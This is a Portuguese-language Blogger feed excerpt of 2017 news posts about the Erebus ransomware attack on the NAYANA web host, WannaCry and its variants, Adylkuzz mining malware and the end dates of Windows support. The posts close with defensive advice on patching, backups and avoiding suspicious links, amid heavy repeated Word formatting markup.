ataque&quot;, observa o pesquisador.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;&quot;Além
disso, o site da NAYANA usa o Apache versão 1.3.36 e PHP versão 5.1.4, ambos
lançados em 2006.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;Erebus,
o ransomware que visa principalmente usuários na Coréia do Sul, criptografa
documentos de escritório, bancos de dados, arquivos e arquivos multimídia
usando o algoritmo RSA-2048 e, em seguida, anexa-os com uma extensão .ecrypt
antes de exibir a nota de resgate.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;&quot;O
arquivo primeiro é codificado com criptografia RC4 em blocos de 500kB com
chaves geradas aleatoriamente&quot;, dizem os pesquisadores. &quot;A chave RC4
é então codificada com o algoritmo de criptografia AES, que é armazenado no
arquivo. A chave AES é novamente criptografada usando o algoritmo RSA-2048 que
também é armazenado no arquivo.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;A
chave pública que é gerada localmente é compartilhada, enquanto a chave privada
é criptografada usando criptografia AES e outra chave gerada aleatoriamente.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;De
acordo com a análise realizada pelos pesquisadores da Trend Micro, a
descriptografia de arquivos infectados não é possível sem se apoderar das
chaves RSA.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;Então,
a única maneira segura de lidar com ataques de resgate é a prevenção. Como
recomendamos anteriormente, a melhor defesa contra o Ransomware é criar
conscientização dentro das organizações, bem como para manter backups que são
rodados regularmente.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;A
maioria dos vírus é introduzida abrindo anexos infectados ou clicando em links
para malwares geralmente em e-mails de spam. Portanto, NÃO CLIQUE em links
fornecidos em e-mails e anexos de fontes desconhecidas.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;Além
disso, assegure-se de que seus sistemas estejam executando a versão mais
recente dos aplicativos instalados.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;Fonte:
&lt;a href=&quot;http://thehackernews.com/2017/06/web-hosting-ransomware.html&quot; target=&quot;_blank&quot;&gt;The Hacker News&lt;/a&gt;&lt;/span&gt; &lt;/span&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2017/07/1024x768-normal-0-21-style-definitions_14.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXnWt3OJbEuzhyqBLvn9rNiLL8WhpxFzkmhc6FqS9Zx10FgCZzjg83LoF8FusvtK4iVvUwN-0vq6n36byLewLQEQhkZFhbY7yRHJRh615aGwMtpWOSHFWl_88-EHQevPu5-U_ZY4CcqA/s72-c/1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-1948809836234565782</guid><pubDate>Fri, 26 May 2017 00:54:00 +0000</pubDate><atom:updated>2017-05-25T21:54:35.876-03:00</atom:updated><title>Descubra Quando a Sua Versão do Windows Deixará de Receber Suporte</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;
O recente ataque do ransomware WannaCry demonstra a importância das atualizações automáticas de segurança dos computadores. Não importa o quanto você seja cuidadoso, o malware pode explorar uma brecha na rede e obter controle do seu sistema a menos que você instale patches de segurança.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Porém, a Microsoft não oferece as atualizações de segurança para todos as versões do sistema operacional Windows para o resto da vida. Além disso, às vezes, a empresa deixa de oferecer o suporte mainstream, mas disponibiliza o estendido.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Conforme publicou o How-To Geek, a diferença entre um e outro é que ao lançar uma versão do Windows pela primeira vez, a companhia oferece o suporte mainstream por cinco anos, com direito às atualizações de segurança e suporte gratuito da equipe da Microsoft. Já o estendido, que também dura cinco anos, só dá direito às atualizações, enquanto o suporte é pago.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Depois desse período de 10 anos, o sistema operacional deixa de receber os patches de segurança. A Microsoft até chega a abrir algumas exceções para empresas que ainda utilizam as versões antigas, mas raras são as vezes que as atualizações de segurança chegam para o público em geral depois que expira o prazo do suporte.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
No caso do WanaCry, a companhia liberou uma atualização geral para Windows XP, Windows 8 e Windows Server 2003, que já não são suportados oficialmente, por ser tratar de uma brecha de segurança grave.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A Microsoft sempre define as datas exatas que deixará de oferecer o suporte à uma versão, que podem ser conferidas (&lt;a href=&quot;https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet&quot;&gt;https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet&lt;/a&gt;). Veja quando termina o suporte da Microsoft para o Windows 7, 8 e 10:&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O Windows 7 é compatível com atualizações de segurança até o dia 14 de janeiro de 2020. No entanto, o usuário precisa ter o Service Pack 1 instalado para obter as demais atualizações.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O Windows 8.1 é compatível com as atualizações de segurança até o dia 10 de janeiro de 2023.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O Windows 10 é suportado até o dia 14 de outubro de 2025. Você deve ter a versão mais recente instalada para continuar recebendo as atualizações.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
A empresa poderia estender essas datas se quiser, mas nunca encerrar o suporte antes.&lt;/div&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2017/05/descubra-quando-sua-versao-do-windows.html</link><author>noreply@blogger.com (Computers Service Informática)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-7855864972454689810</guid><pubDate>Mon, 22 May 2017 23:33:00 +0000</pubDate><atom:updated>2017-05-22T20:33:46.661-03:00</atom:updated><title></title><description>&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 24px;&quot;&gt;&lt;b&gt;Pesquisadores acreditam que ataque maior que o WannaCry poderá acontecer&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 15px;&quot;&gt;Malware, por ser silencioso, pode ter feito ainda mais vítimas no mundo.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O ataque virtual que aconteceu na última semana ainda está rendendo alguns prejuízos em várias partes do mundo. De acordo com especialistas em segurança, a brecha usada no ataque também já foi utilizada em uma edição anterior, que pode ter vitimado mais máquinas e também usuários do que o atual. Até então, os números somam 200 mil computadores comprometidos no mundo todo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O ataque anterior foi chamado de Adylkuzz, e utiliza a mesma arma EternalBlue desenvolvida pela NSA e vazada pelo grupo Shadow Brokers. A diferença é método usado: Ao invés de travar o computador e pedir resgate para liberá-lo, o malware instala um software para mineração da criptomoeda Monero, semelhante à Bitcoin, porém, que promete o anonimato de todas as transações.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHN7kcklX5vS7vnGTUXWtlbOWfMu938gAB1SEpeba3w5o3uExLQZ5Yc-jrCo5QbGvr-8hvtsZEKFBIX7F2FOQ6EM2hlL8iKQqhZxR6PwWtzknC3ik3tQB5-dldsyFv1SMMOwMoqzm_ZE/s1600/wannacry.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHN7kcklX5vS7vnGTUXWtlbOWfMu938gAB1SEpeba3w5o3uExLQZ5Yc-jrCo5QbGvr-8hvtsZEKFBIX7F2FOQ6EM2hlL8iKQqhZxR6PwWtzknC3ik3tQB5-dldsyFv1SMMOwMoqzm_ZE/s320/wannacry.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;De acordo com o especialista de segurança Proofpoint, o ataque teve início entre 24 de abril e 2 de maio, agindo de modo mais silencioso.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;O modo de agir do Adylkuzz é muito direto, através da brecha EternalBlue, os computadores acabam infectados com um sistema chamado DoublePulsar, que acaba abrindo uma porta dos fundos para a instalação do AdyKuzz.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;&quot;As estatísticas iniciais sugerem que esse ataque pode ser em maior escala que o WannaCry, afetando centenas de milhares de computadores e servidores ao redor do mundo&quot;, informa a empresa&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;Diferentemente do WannaCry, não há nenhuma tela informativa sobre um computador infectado. Os sintomas são a perda de acesso a recursos de rede e também lentidão no computador. Sendo assim, por ser mais discreto, ele pode ter feito mais vítimas, o que o deixa impressionante e perigoso.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;Para prevenção do Adylkuzz a prevenção é a mesma, ou seja, atualização do Windows.&lt;/div&gt;&lt;br&gt;</description><link>http://computersservicetecnica.blogspot.com/2017/05/pesquisadores-acreditam-que-ataque.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHN7kcklX5vS7vnGTUXWtlbOWfMu938gAB1SEpeba3w5o3uExLQZ5Yc-jrCo5QbGvr-8hvtsZEKFBIX7F2FOQ6EM2hlL8iKQqhZxR6PwWtzknC3ik3tQB5-dldsyFv1SMMOwMoqzm_ZE/s72-c/wannacry.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-5641735456599161023</guid><pubDate>Mon, 22 May 2017 22:55:00 +0000</pubDate><atom:updated>2017-05-22T20:19:40.679-03:00</atom:updated><title></title><description>&lt;div&gt;
&lt;span style=&quot;font-size: 22px;&quot;&gt;&lt;b&gt;Wanna Cry 2.0: Estão circulando novas versões do malware&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;O ransomware vem ganhando novas versões e novos ataques devem acontecer em breve&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;O exploit que originou o ciberataque massivo foi roubado da NSA, agência de segurança dos Estados Unidos, afirma Microsoft.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;O Ransomware Wanna Crypt0r foi o malware desvastador que atingiu 99 países com inúmeros ataques, que de acordo com a Microsoft em sua publicação sobre “Lições do Ciberataque”, afirmou envolvimento da NSA com a brecha do Windows XP. Já a Kaspersky e Symantec afirmam ter encontrado algum resquício de códigos vindos da Coréia do Norte, para a briga começar a ficar pesada.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;As brechas estavam sendo utilizadas para vigilância e espionagem, mas os exploits da Agência de Segurança Nacional norte-americana foram vazados, assim como outras informações pelo WikiLeaks.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;Brad Smith, da Microsoft diz &quot;Seguidamente, os exploits nas mãos de governos têm vazado em domínios públicos e causado um vasto dano. Em um cenário equivalente, é como se os mísseis Tomahawk do exército dos EUA tivessem sido roubados. Os governos precisam tratar a ameaça desse ataque como um despertador. Eles precisam adotar uma abordagem diferente e colocar as mesmas leis aplicadas à armas do mundo real no ciberespaço&quot;.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;Logo após os ataques a Microsoft disponibilizou um patch para corrigir a brecha explorada pelo ransomware WannaCry, mas para a Avast, os computadores ainda estão vulneráveis, em torno de 15% dos usuários do antivírus não realizaram a atualização MS17-010 da Microsoft.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;Uma nova versão do ransomware foi encontrada pela empresa de segurança Check Point na segunda-feira (15), cujo vírus seria capaz de infectar 3,6 mil computadores por hora, mas ainda bem que a empresa conseguiu neutralizar o respectivo vírus evitando seus ataques.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;“Posso garantir que existem versões sem os domínios Kill Switch” afirma o diretor de pesquisa global da Kaspersky Labs, Costin Raiu. Isso impede que cessem os ataques, pois o ransomware está ganhando novas versões que levam certo tempo para descobrir como pará-lo.&lt;/div&gt;&lt;br&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;Com ataques cibernéticos acontecendo vale seguir as orientações de especialistas realizando um backup seguro e baixar todas as atualizações da Microsoft, diminuindo a probabilidade de seu computador ficar vulnerável aos ataques, tome cuidado para não clicar em nenhum e-mail suspeito ou qualquer mensagem que apareça na sua tela. Cuidado.&lt;/div&gt;



</description><link>http://computersservicetecnica.blogspot.com/2017/05/wanna-cry-2.html</link><author>noreply@blogger.com (Computers Service Informática)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-3292772081899558789</guid><pubDate>Tue, 16 May 2017 17:58:00 +0000</pubDate><atom:updated>2017-05-16T14:58:44.489-03:00</atom:updated><title>Ataque atinge computadores de 99 países e hackers arrecadam o equivalente a 80 mil dólares</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;

&lt;div&gt;&lt;span style=&quot;font-size: 16px;&quot;&gt;O Windows foi o escolhido pelos hackers por ser o mais utilizado no mundo todo e a moeda virtual Bitcoin facilitou a solicitação de resgate&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;

Foi na Inglaterra que um jovem de 22 anos conseguiu colocar um fim nos ataques virtuais sem precedentes. Quando o ataque começou, na sexta-feira, era meio dia, afetando mais de 125 mil pessoas em poucas horas; usuários de 99 países obtiveram seus computadores sequestrados.&lt;br&gt;&lt;br&gt;

